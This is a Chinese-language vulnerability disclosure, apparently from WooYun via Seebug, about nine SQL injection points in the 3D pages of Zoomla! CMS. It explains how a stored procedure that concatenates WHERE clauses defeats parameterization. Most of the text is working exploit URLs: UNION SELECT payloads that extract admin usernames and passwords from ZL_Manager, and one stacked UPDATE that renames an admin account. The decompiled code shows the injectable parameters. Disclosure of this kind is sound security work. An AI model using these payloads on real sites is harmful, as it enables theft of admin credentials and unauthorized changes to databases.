### 简要描述:
影响版本Zoomla!cms4.1源码Zoomla!CMS2_x1.5源码 Zoomla!CMS6.0 Zoomla!逐浪CMS2_x1.4正式版
此文件夹注入点蛮多的 厂商需努力呀
### 详细说明:
文件目录3D
注入1
文件/3D/1sMail.aspx 问题阐述 ShopID
测试:
```
http://192.168.10.19:9992/3d/sMail.aspx?ShopID=1000000 union/**/ all select/**/ 1,2,'3','4','5','6','7','8','9',STUFF(adminPassword , 1, 0, AdminName),11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
```
代码片段如下
```
if (base.Request.QueryString["ShopID"] != null)
{
string text = base.Request.QueryString["ShopID"].ToString();
this.HiddenField2.Value = text;
DataTable dataTable = this.bdu.Select_Where(" Dutype=1 and DuShow=" + text, " * ", "");
if (dataTable.Rows.Count <= 0)
{
base.Response.Write("<script>alert('error');location.href='Default.aspx'</script>");
return;
}
this.txtSend.Text = dataTable.Rows[0]["DEmail"].ToString();
}
```
虽然 Select_Where方法调用的存储过程进行了参数化 但是咱们看如下代码片段
```
public DataTable Select_Where(string strSQL, string strSelect, string Orderby)
{
string cmdText = "PR_Duser_Select_Where";
SqlParameter[] array = new SqlParameter[3];
array[0] = new SqlParameter("@WhereCondition", SqlDbType.NVarChar, 500);
array[0].Value = strSQL;
array[1] = new SqlParameter("@SelectCondition", SqlDbType.NVarChar, 500);
array[1].Value = strSelect;
array[2] = new SqlParameter("@OrderByExpression", SqlDbType.NVarChar, 250);
array[2].Value = Orderby;
return SqlHelper.ExecuteTable(CommandType.StoredProcedure, cmdText, array);
}
```
看存储过程 PR_Duser_Select_Where
```
SET @SQL = '
SELECT
' + @SelectCondition + '
FROM
[dbo].[ZL_Duser]
WHERE
' + @WhereCondition
IF @OrderByExpression IS NOT NULL AND LEN(@OrderByExpression) > 0
BEGIN
SET @SQL = @SQL + '
ORDER BY
' + @OrderByExpression
END
```
显然程序中的参数化没起到任何作用
结果如下图
[<img src="https://images.seebug.org/upload/201405/10113038f3b592bb6f586f1cbfdec92dee0dcd5a.jpg" alt="10-1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/10113038f3b592bb6f586f1cbfdec92dee0dcd5a.jpg)
注:此处还有一个地方有注入(未利用)就是页面的DropDownList3下拉菜单的下拉事件
代码片段如下
```
protected void DropDownList3_SelectedIndexChanged(object sender, EventArgs e)
{
switch (this.DropDownList2.SelectedIndex)
{
case 0:
this.GetUserData(this.mmbll.GetSend());
return;
case 1:
case 2:
this.GetUserData(this.mmbll.GetABC(this.DropDownList3.SelectedValue, "1"));
return;
case 3:
case 4:
case 5:
break;
case 6:
this.GetUserData(this.mmbll.GetSubscribe(this.DropDownList3.SelectedValue, "1"));
break;
default:
return;
}
}
```
这里直接获取的this.DropDownList3.SelectedValue的值此值可在UI中修改 GetABC方法代码片段如下
```
public DataTable GetABC(string str, string state)
{
string str2 = "";
if (!string.IsNullOrEmpty(state))
{
str2 = " and State='" + state + "'";
}
return this.Select_Wheres(" Email like '" + str + "%' " + str2, " * ", " AddTime desc");
}
```
虽然页面中未显示DropDownList3这个控件页未成功利用 但是这个地方代码 希望官方还是能修改一下
注入2:
文件/3D/ShowForm.aspx 问题参数shopid
测试:
```
http://192.168.1.107:8885/3d/ShowForm.aspx?shopid=1000 union/**/ all select/**/ 1,2,'3','4','5','6','7','8','9',STUFF(adminPassword , 1, 0, AdminName),11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
```
如下代码片段
```
if (base.Request.QueryString["ShopID"] != null)
{
DataTable dataTable = new DataTable();
this.shopid = base.Request.QueryString["ShopID"].ToString();
this.Hiddenshopid.Value = this.shopid;
dataTable = this.bdu.Select_Where(" Dutype=1 and DuShow=" + this.shopid, " * ", "");
if (dataTable.Rows.Count <= 0)
{
DataTable dataTable2 = this.bdsbll.Select_Where("D_ShowUserid=" + this.bubll.GetLogin().UserID.ToString(), "*", "");
int dShowUserID = DataConverter.CLng(dataTable2.Rows[0]["D_sid"]);
if (dataTable2.Rows.Count > 0)
{
M_DShowUser select = this.bdsbll.GetSelect(dShowUserID);
select.D_ShopID = 0;
select.D_Remark = "";
select.D_ShowX += 2;
select.D_ShowY += 2;
select.DupdateTime = DateTime.Now;
this.bdsbll.GetUpdate(select);
}
base.Response.Write("<script>alert('对不起!商店还没有参展商!');window.history.go(-1);</script>");
}
```
还是Select_Where方法出现问题
还是和第一个注入过程是一样的调取的存储过程也是一样的
[<img src="https://images.seebug.org/upload/201405/101132410d445a9ec851d5998cf8135704031291.jpg" alt="20-1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/101132410d445a9ec851d5998cf8135704031291.jpg)
注入3:
文件 3d/InDoor.aspx 也就是showform。aspx中嵌入的的页面
http://192.168.10.19:9992/3d/InDoor.aspx?ShopID=100;update/**/ ZL_Manager set AdminName='WooyunDamo' where/**/ AdminID=1--
同样执行的同一个存储过程
结果如下图
[<img src="https://images.seebug.org/upload/201405/101133160d02e9ff1a2dddf64a0ca444a4cf2c16.jpg" alt="30-1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/101133160d02e9ff1a2dddf64a0ca444a4cf2c16.jpg)
注入4
文件:3d/InsertContext.aspx?type=Suser
个人原因 没有继续 但是看代码
```
if (base.Request.QueryString["type"] != null)
{
this.md.Caddtime = DateTime.Now;
this.md.Cadduser = this.user.GetLogin().UserName;
string text = base.Request.Form.ToString();
text = base.Server.UrlDecode(text);
try
{
text = BaseClass.FromBase64String(text);
}
catch (Exception ex)
{
text = ex.ToString() + text;
}
if (text.IndexOf("$") > -1)
{
string[] array = text.Split(new char[]
{
'$'
}, StringSplitOptions.RemoveEmptyEntries);
if (base.Request.QueryString["type"].ToString() == "Suser")
{
DataTable dataTable = this.bduser.Select_Where(" Dutype=1 and DuShow=" + array[1], " * ", "");
if (dataTable.Rows.Count > 0)
{
this.md.Ctouid = DataConverter.CLng(dataTable.Rows[0]["DUid"].ToString());
}
this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", "");
if (this.dt.Rows.Count > 0 && this.mduser.Dislogin == 0)
{
this.mduser.Dmessage = this.mduser.Dmessage + 1;
}
}
```
YY的想法:测试方式 form提交 然后转码 base.Server.UrlDecode(text); 然后FromBase64String(text);解码 然后解码之后的数据应该是介个样子的
理论数据 aaaa$bbbbb$ccccc$ddddd 然后代码过程则是根据$进行截取并且去除$ 那么这里控制array[1] 页就是bbbbb的值即可完成注入
调取的还是原来的方法 还是熟悉的存储过程
小弟本地未亲测 但是这个地方代码 希望官方还是能修改一下
注入5:
文件3D/showBgRe.aspx
http://192.168.10.19:9992/3d/showBgRe.aspx?scen=100&ShopID=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
结果如下图
[<img src="https://images.seebug.org/upload/201405/1011345219f82ff0994d9c230e827ed643fb3b87.jpg" alt="50-1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1011345219f82ff0994d9c230e827ed643fb3b87.jpg)
注入6:
文件 3D/ShowChat.aspx
http://192.168.10.19:9992/3d/ShowChat.aspx?type=2&uid=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
结果如下图
[<img src="https://images.seebug.org/upload/201405/10113608dc9add60bf9413c03bf477c1105aa02d.jpg" alt="60-1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/10113608dc9add60bf9413c03bf477c1105aa02d.jpg)
注入7:
文件3D/ShowInfo.aspx 问题参数 ShopID
http://192.168.10.19:9992/3d/ShowInfo.aspx?ShopID=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
图只是用来显示密码用的给WOOYUN省空间就不上传了
注入8:
文件3D/ShowNote.aspx 问题参数 ShopID
http://192.168.10.19:9992/3d/ShowNote.aspx?ShopID=100 union/**/ all select/**/ STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager
还是原来的方法 还是熟悉的存储过程
图只是用来显示密码用的给WOOYUN省空间就不上传了
注入9:
文件3D/UpdateCoordinate.aspx
代码片段如下
if (base.Request.QueryString["type"] == "shopuser")
{
this.ShopUser(base.Request.Form.ToString());
this.UpdateDate();
}
private void ShopUser(string shopid)
{
if (shopid != "")
{
DataTable dataTable = this.bds.Select_Where(" D_ShopID=" + shopid, " D_ShowUserid, D_Remark", "");
string str = "false";
StringBuilder stringBuilder = new StringBuilder();
if (dataTable.Rows.Count > 0)
{
.........
}
}
}
YY想法: 问题方法Select_Where 存储过程 PR_DShowUser_Select_Where 利用方法还是一样 不过这次注意参数是Request.Form.ToString()
### 漏洞证明:
已经在上图了
暂无评论